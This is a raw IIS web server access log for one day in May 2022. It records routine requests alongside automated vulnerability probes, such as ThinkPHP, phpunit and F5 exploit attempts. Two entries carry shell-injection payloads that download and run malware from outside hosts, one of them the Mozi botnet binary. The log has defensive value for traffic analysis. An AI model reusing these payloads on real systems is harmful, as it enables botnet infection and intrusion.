#Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2022-05-11 00:00:23 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2022-05-11 00:00:23 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2743.116+Safari/537.36 - 200 0 0 226 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2022-05-11 00:31:56 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2022-05-11 00:31:56 192.168.0.14 POST /boaform/admin/formLogin - 80 - 192.168.0.1 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64;+rv:71.0)+Gecko/20100101+Firefox/71.0 http://14.139.109.23:80/admin/login.asp 404 0 2 412 2022-05-11 00:34:21 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(X11;+Linux+x86_64;+rv:68.0)+Gecko/20100101+Firefox/68.0 - 200 0 0 92 2022-05-11 00:35:57 192.168.0.14 POST /mgmt/tm/util/bash - 80 - 192.168.0.1 - - 404 0 2 10735 2022-05-11 00:35:57 192.168.0.14 ST /mgmt/tm/util/bash - 80 - 192.168.0.1 - - 404 0 2 693 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2022-05-11 01:55:47 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2022-05-11 01:55:47 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/60.0.3112.113+Safari/537.36 - 200 0 0 527 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2022-05-11 02:13:58 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2022-05-11 02:13:58 192.168.0.14 HEAD /robots.txt - 80 - 192.168.0.1 - - 404 0 2 186 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2022-05-11 02:49:01 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2022-05-11 02:49:01 192.168.0.14 GET /w00tw00t.at.blackhats.romanian.anti-sec:) - 80 - 192.168.0.1 ZmEu - 404 0 2 433 2022-05-11 02:49:01 192.168.0.14 GET /phpMyAdmin/scripts/setup.php - 80 - 192.168.0.1 ZmEu - 404 0 2 340 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2022-05-11 03:05:07 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2022-05-11 03:05:07 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64;+rv:76.0)+Gecko/20100101+Firefox/76.0 - 200 0 0 352 2022-05-11 03:15:19 192.168.0.14 GET / - 80 - 192.168.0.1 https://gdnplus.com:Gather+Analyze+Provide. - 200 0 0 230 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2022-05-11 04:56:06 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2022-05-11 04:56:06 192.168.0.14 POST /boaform/admin/formLogin - 80 - 192.168.0.1 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64;+rv:71.0)+Gecko/20100101+Firefox/71.0 http://14.139.109.23:80/admin/login.asp 404 0 2 455 2022-05-11 05:05:40 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/60.0.3112.113+Safari/537.36 - 200 0 0 138 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2022-05-11 07:49:07 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2022-05-11 07:49:07 192.168.0.14 GET / - 80 - 192.168.0.1 - - 200 0 0 608 2022-05-11 07:59:44 192.168.0.14 POST /Autodiscover/Autodiscover.xml - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/78.0.3904.108+Safari/537.36 - 404 0 2 263 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2022-05-11 08:58:39 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2022-05-11 08:58:39 192.168.0.14 GET / XDEBUG_SESSION_START=phpstorm 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/78.0.3904.108+Safari/537.36 - 200 0 0 1628 2022-05-11 09:05:48 192.168.0.14 POST / - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/100.0.4896.127+Safari/537.36 - 405 0 1 204 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2022-05-11 10:03:54 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2022-05-11 10:03:54 192.168.0.14 GET /console/ - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/78.0.3904.108+Safari/537.36 - 404 0 2 466 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2022-05-11 10:21:55 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2022-05-11 10:21:55 192.168.0.14 GET / - 80 - 192.168.0.1 - - 200 0 0 287 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2022-05-11 11:12:46 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2022-05-11 11:12:46 192.168.0.14 POST /boaform/admin/formLogin - 80 - 192.168.0.1 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64;+rv:71.0)+Gecko/20100101+Firefox/71.0 http://14.139.109.23:80/admin/login.asp 404 0 2 449 2022-05-11 11:17:06 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64;+rv:77.0)+Gecko/20100101+Firefox/77.0 http://14.139.109.23:80/left.html 200 0 0 254 2022-05-11 11:20:29 192.168.0.14 GET /index.php s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/78.0.3904.108+Safari/537.36 - 404 0 2 175 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2022-05-11 12:12:04 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2022-05-11 12:12:04 192.168.0.14 GET / a=fetch&content=die(@md5(HelloThinkCMF)) 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/78.0.3904.108+Safari/537.36 - 200 0 0 419 2022-05-11 12:21:22 192.168.0.14 GET / - 80 - 192.168.0.1 - - 200 0 0 480 2022-05-11 12:26:13 192.168.0.14 GET /actuator/gateway/routes - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/78.0.3904.108+Safari/537.36 - 404 0 2 226 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2022-05-11 13:07:46 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2022-05-11 13:07:46 192.168.0.14 GET / - 80 - 192.168.0.1 Go-http-client/1.1 - 200 0 0 444 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2022-05-11 13:55:03 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2022-05-11 13:55:03 192.168.0.14 GET /solr/admin/info/system wt=json 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/78.0.3904.108+Safari/537.36 - 404 0 2 389 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2022-05-11 14:29:08 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2022-05-11 14:29:08 192.168.0.14 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/78.0.3904.108+Safari/537.36 - 404 0 2 290 2022-05-11 14:32:09 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2743.116+Safari/537.36 - 200 0 0 495 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2022-05-11 15:04:07 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2022-05-11 15:04:07 192.168.0.14 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/78.0.3904.108+Safari/537.36 - 404 0 2 295 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2022-05-11 15:53:03 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2022-05-11 15:53:03 192.168.0.14 GET / - 80 - 192.168.0.1 python-requests/2.27.1 - 200 0 0 397 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2022-05-11 16:10:16 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2022-05-11 16:10:16 192.168.0.14 GET /_ignition/execute-solution - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/78.0.3904.108+Safari/537.36 - 404 0 2 183 2022-05-11 16:15:24 192.168.0.14 GET /echo.php - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 https://www.google.com/ 404 0 2 171 2022-05-11 16:26:01 192.168.0.14 GET /admin/ - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/60.0.3112.113+Safari/537.36 - 404 0 2 298 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2022-05-11 18:55:48 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2022-05-11 18:55:48 192.168.0.14 GET /mgmt/shared/authn/login - 80 - 192.168.0.1 Mozilla/5.0+zgrab/0.x - 404 0 2 463 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2022-05-11 19:14:46 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2022-05-11 19:14:46 192.168.0.14 GET / - 80 - 192.168.0.1 - - 200 0 64 307 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2022-05-11 19:43:43 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2022-05-11 19:43:43 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+zgrab/0.x - 200 0 0 467 2022-05-11 19:46:15 192.168.0.14 GET /.env - 80 - 192.168.0.1 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/81.0.4044.129+Safari/537.36 - 404 0 2 215 2022-05-11 19:58:34 192.168.0.14 GET /setup.cgi next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://117.223.92.2:34350/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 80 - 192.168.0.1 - - 404 0 2 88 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2022-05-11 20:39:20 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2022-05-11 20:39:20 192.168.0.14 GET /shell cd%20%2Ftmp%20%7C%7C%20cd%20%2Frun%20%7C%7C%20cd%20%2F%3Bwget%20http%3A%2F%2F172.245.210.119%2F.19%20-O%20sParc%3B%20chmod%20777%20sParc%3B%20sh%20sParc%3Brm%20-rf%20sParc%3Bclear%3Bhistory%20-c%3B%20clear%3Bhistory%20-w 80 - 192.168.0.1 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64;+rv:76.0)+Gecko/20100101+Firefox/76.0 - 404 0 64 369 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2022-05-11 20:56:45 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2022-05-11 20:56:45 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(compatible;+tchelebi/1.0;++http://tchelebi.io) - 200 0 0 212 2022-05-11 20:59:44 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/60.0.3112.113+Safari/537.36 - 200 0 0 241 2022-05-11 21:00:46 192.168.0.14 GET / - 80 - 192.168.0.1 - - 200 0 0 2988 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2022-05-11 23:22:06 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2022-05-11 23:22:06 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+zgrab/0.x - 200 0 0 462 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2022-05-11 23:42:17 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2022-05-11 23:42:17 192.168.0.14 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/78.0.3904.108+Safari/537.36 - 404 0 2 193 2022-05-11 23:42:19 192.168.0.14 GET /bag2 - 80 - 192.168.0.1 Mozilla/4.0+(compatible;+MSIE+8.0;+Windows+NT+6.0;+Trident/4.0) - 404 0 2 182